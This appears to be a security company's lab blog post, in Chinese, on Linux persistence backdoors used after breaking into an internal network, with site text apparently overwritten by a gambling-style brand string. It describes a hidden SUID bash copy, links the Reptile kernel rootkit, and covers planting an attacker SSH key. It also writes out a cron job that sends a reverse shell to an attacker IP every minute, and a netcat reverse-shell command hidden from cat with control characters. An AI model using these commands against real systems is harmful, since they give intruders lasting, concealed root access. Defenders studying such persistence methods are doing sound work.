黄金城官网实验室 | 内网渗透—Linux权限维持技巧总结-





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于黄金城 用户退出 合作商登录 用户登录 申请试用

数据黄金城官网


数据库保险箱数据黄金城官网分类分级平台数据黄金城官网综合评估系统新一代数据黄金城官网一体化平台
存储域
数据库加密诺亚防勒索
访问域
数据库防水坝数据库防火墙数据库黄金城官网审计动态脱敏
流动域
静态脱敏数据水印 API审计 API防控医疗防统方
运行黄金城官网


新一代灾备一体化平台灾备一键通数据库运行黄金城官网管理平台
数据流动


数据流动平台静态脱敏数据水印
黄金城官网运维服务



运维服务
数据库运维服务中间件运维服务国产信创改造服务驻场运维服务供数服务
黄金城官网咨询服务
数据出境黄金城官网治理服务数据黄金城官网能力评估认证服务数据黄金城官网风险评估服务数据黄金城官网治理咨询服务数据分类分级咨询服务个人信息风险评估服务数据黄金城官网检查服务

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯黄金城官网研究

热门阅读

用AI重新定义数据黄金城官网监测，让数据黄金城官网变简单

2026-03-17

金融机构数据黄金城官网能力体系建设与落地实践

2026-02-27

开工大吉｜策马扬鞭，跃启新程！

2026-02-25

浙江省委宣传部副部长、省委网信办主任赵磊：守正创新辩证施策全力推动网络生态治理工作迈上新台阶

2026-02-10

黄金城产品全面入围中直机关2025年网络设备框架协议采购项目

2026-02-04

相关文章

每周黄金城官网速递??? | 密西西比大学医学中心在遭受勒索软件攻击后恢复正常运营

2026-03-09

每周黄金城官网速递??? | LockBit5.0版本支持Windows、Linux与ESXi平台

2026-03-09

每周黄金城官网速递??? | Osiris勒索软件利用BYOVD技术禁用黄金城官网工具

2026-02-02

每周黄金城官网速递??? | DeadLock勒索软件团伙利用Polygon智能合约存储代理服务器地址

2026-01-19

每周黄金城官网速递??? | 勒索软件攻击导致心理健康机构超11万人数据泄露

2026-01-06

黄金城官网实验室 | 内网渗透—Linux权限维持技巧总结

发布时间：2020-12-25 阅读次数： 403 次

在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持（点击阅读）的方式，本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索。Linux也是在内网渗透中很常见的操作系统，但是其内部实现方式却与Windows有着本质的区别。我们在对Windows权限维持方式的基础上总结Linux系统的权限维持方式。

01、SUID后门

SUID是Set uid的简称，当一个文件的所属主的标识位是x，且所属主为root时，当执行该文件时，是以root身份执行的。所以如果攻击者创建一个满足上述条件的文件，并且使用该文件反弹一个bash的话，就会使一个普通用户得到一个root权限的shell。

创建文件时必须具备以下条件：

SUID权限只对二进制程序有效；

执行者对于该程序需要具有x的可执行权限；

本权限仅在执行该程序的过程中有效；

在执行过程中执行者将具有该程序拥有者的权限；

首先使用root权限创建一个suid权限的隐藏文件，这个文件是/bin/bash的复制文件。

其次，使用普通用户登入系统，使用如下命令/var/.hack -p，执行该文件以获得一个root shell，执行后可以看到权限已经变成了root权限。

02、Linux内核Rootkit后门

内核级Linux Rootkit的隐藏性通常要借助对Linux系统调用的截获来达到目的，并且难以查杀、难以清除，�：薮�。主要适用的目标版本如下：

Debian 9：4.9.0-8-amd64

Debian 10：4.19.0-8-amd64

Ubuntu 18.04.1 LTS：4.15.0-38-generic

Kali Linux：4.18.0-kali2-amd64

Centos 6.10：2.6.32- 754.6.3.el6.x86_64

Centos 7：3.10.0-862.3.2.el7.x86_64

Centos 8：4.18.0-147.5.1.el8_1.x86_64

项目地址为：

https://github.com/f0rb1dd3n/Reptile

03、SSH后门

SSH是Linux提供的一种远程登陆服务，SSH总共提供了两种登陆验证方式：一是账号密码登录，也是常用的登陆方式；二是公私钥登录，SSH允许验证登录者提供的私钥与自身公钥是否匹配，以确定是否允许该用户登录。具体验证方式如下：

首先攻击者在本地生成一份SSH登录的公私钥对，使用如下命令即可：

ssh-keygen -trsa。

使用ssh-keygen生成两份文件，分别是id_rsa和id_rsa.pub前者是私钥文件，后者是公钥文件。使用某种方法，将攻击者生成的公钥文件id_rsa.pub上传进目标机~/.ssh/authorized_keys目录下即可。

使用ssh直接登录目标机即可，无需账号密码。

04、计划任务后门

与Windows一样，Linux也提供了计划任务程序，在Linux系统中计划任务一般是由cron承担。我们使用cron添加一个反弹shell的计划任务，以实现权限维持。

首先检查目标机是否开启了计划任务。

利用cron程序写入一个计划任务：’*/1 * * * * bash -I>& /dev/tcp/<攻击者IP>/<攻击者端口> 0>&1’使其每一分钟向攻击者IP发弹一次shell。

在攻击机上监听相应的端口，过了一分钟即可接收到来自目标机的反弹shell，实现权限维持。

05、Cat命令缺陷后门

Cat命令是Linux系统自带的指令，能够查看文件的具体内容。但是Cat指令却存在缺陷，cat默认是支持一些如回车符换行符f换页符等特殊符号，这些符号可能导致一些内容被错误的解析，进而隐藏一些系统命令。

创建一个python文件，使其能够生成一个包含特殊符号的.sh文件，这个文件可以将恶意指令进行隐藏。

使用普通的cat指令查看这个.sh文件，发现恶意指令被隐藏。重新使用cat指令带上-A参数即可看到该文件的真实全部内容。可以查看到恶意指令：nc -e /bin/sh 192.168.210.37 9999。

如果管理员没有仔细查看文件的具体内容就执行了该文件，攻击机则可以接到一个来自目标机的反弹shell。

上一条：每周黄金城官网速递???｜美国一学校遭勒索软件攻击泄露个人信息
下一条：《数据黄金城官网能力成熟度模型》实践指南：数据接口黄金城官网

返回

快速入口

免费试用售后服务客户案例文档中心年度培训
热门产品

新一代灾备一体化平台数据流动平台数据库运行黄金城官网管理平台新一代数据黄金城官网一体化平台数据黄金城官网治理咨询服务数据分类分级咨询服务
解决方案

政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案
合作发展

渠道政策合作申请渠道专区
关于黄金城

关于我们大事记最新动态加入我们联系我们

关注或联系黄金城

官方订阅号

官方服务号

第59号

服务热线：400-811-3777

商务合作：marketing@mchz.com.cn

友情链接中央网信办公安部工信部 CNCERT 中国信通院中国软件测评中心国家工业信息黄金城官网发展研究中心赛迪研究院

Copyright ? 2024 杭州黄金城科技股份有限公司 All rights reserved.

浙公网安备 33010502006954号浙ICP备12021012号-1 网站地图网站声明及隐私保护政策

免费试用

服务热线

马上咨询

400-811-3777



【网站地图】【sitemap】